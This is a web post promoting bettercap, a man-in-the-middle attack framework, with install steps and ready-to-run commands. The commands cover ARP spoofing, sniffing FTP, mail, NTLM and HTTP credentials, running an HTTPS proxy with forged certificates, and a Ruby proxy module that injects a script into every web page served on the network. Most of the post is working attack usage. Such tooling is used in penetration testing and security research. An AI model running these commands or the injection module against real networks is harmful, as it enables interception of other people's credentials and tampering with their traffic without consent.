Man-In-The-Middle

Bettercap – Extensible MITM Framework

October 6, 2017
5 Min Read

bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

better_cap_logo

Does a complete, modular, portable and easy to extend MITM tool actually exist?

If your answer is “ettercap”, let me tell you something:

  • ettercap was a great tool, but it made its time.
  • ettercap filters do not work most of the times, are outdated and hard to implement due to the specific language they’re implemented in.
  • ettercap is freaking unstable on big networks … try to launch the host discovery on a bigger network rather than the usual /24
  • yeah you can see connections and raw pcap stuff, nice toy, but as a professional researcher you want to see only relevant stuff.
  • unless you’re a C/C++ developer, you can’t easily extend ettercap or make your own module.

Indeed you could use more than just one tool … maybe arpspoof to perform the actual poisoning, mitmproxy to intercept HTTP stuff and inject your payloads and so forth … I don’t know about you, but I hate when I need to use a dozen of tools just to perform one single attack, especially when I need to do some black magic in order to make all of them work on my distro or on OSX … what about the KISS principle?

So bettercap was born …

bettercap_discovery

 

BETTERCAP FEATURES

  • Dynamic Host Discovery + ARP Spoofing

    You can target the whole network or a single known address, it doesn’t really matter, bettercap arp spoofing capabilities and its multiple hosts discovery agents will do the dirty work for you.

    Just launch the tool and wait for it to do its job … and of course, new machines appearing on the network will be discovered and spoofed automagically … again, KISS!

    Oh, your router has some builtin protection against ARP spoofing? Don’t worry, you can go half duplex

 

bettercap-logo

  • Credentials Sniffer

    The built in sniffer is currently able to dissect and print from the network the following informations:

    • URLs being visited.
    • HTTPS host being visited.
    • HTTP POSTed data.
    • HTTP Basic and Digest authentications.
    • FTP credentials.
    • IRC credentials.
    • POP, IMAP and SMTP credentials.
    • NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.

     

    Examples

    Default sniffer mode, all parsers enabled:

    sudo bettercap -X

    Enable sniffer and load only specified parsers:

    sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"

    Enable sniffer + all parsers and parse local traffic as well:

    sudo bettercap -X -L

    Enable sniffer + all parsers and also dump everything to a pcap file:

    sudo bettercap --sniffer --sniffer-pcap=output.pcap

    What about saving only HTTP traffic to that pcap file?

    sudo bettercap --sniffer --sniffer-pcap=http.pcap --sniffer-filter "tcp and dst port 80"

     

  • Modular Transparent Proxy

    A modular HTTP and HTTPS transparent proxy can be started with the –proxy argument, by default it won’t do anything but logging HTTP requests, but if you specify a –proxy-module argument you will be able to load your own modules and manipulate HTTP traffic as you like.

    You can find some example modules in the dedicated repository.


    Examples

    Enable proxy on default ( 8080 ) port with no modules ( quite useless ):

    sudo bettercap --proxy

    Enable proxy and use a custom port:

    sudo bettercap --proxy --proxy-port=8081

    Enable proxy and load the module hack_title.rb:

    sudo bettercap --proxy --proxy-module=hack_title.rb

    Disable spoofer and enable proxy ( stand alone proxy mode ):

    sudo bettercap --no-spoofing --no-discovery --proxy

    Enable HTTPS proxy with realtime crafted certificate:

    sudo bettercap --proxy-https

    Enable HTTPS proxy with custom .pem certificate:

    sudo bettercap --proxy-https --proxy-pem ./mycert.pem

     

  • Builtin HTTP Server

    You want to serve your custom javascript files on the network? Maybe you wanna inject some custom script or image into HTTP responses using a transparent proxy module but you got no public server  to use? no worries dude ????

    A builtin HTTP server comes with bettercap, allowing you to serve custom contents from your own machine without installing and configuring other softwares such as Apache, nginx or lighttpd.

    You could use a proxy module like the following:

    class InjectJS < Proxy::Module  
  def on_request( request, response )
    # is it a html page?
    if response.content_type =~ /^text\/html.*/
      Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
      # get the local interface address and HTTPD port
      localaddr = Context.get.ifconfig[:ip_saddr]
      localport = Context.get.options[:httpd_port]
      # inject the js
      response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script>" )
    end
  end
end

    And then use it to inject the js file in every HTTP response of the network, using bettercap itself to serve the file:

    sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb

     

Dependencies

All dependencies will be automatically installed through the GEM system, in some cases you might need to install some system dependency in order to make everything work:

sudo apt-get install ruby-dev libpcap-dev

 

Stable Release ( GEM )

gem install bettercap

 

Development Release

git clone https://github.com/evilsocket/bettercap
cd bettercap
gem build bettercap.gemspec
sudo gem install bettercap*.gem

 

Quick Start

Once you’ve installed bettercap, quickly get started with:

bettercap --help

Download Bettercap

Tags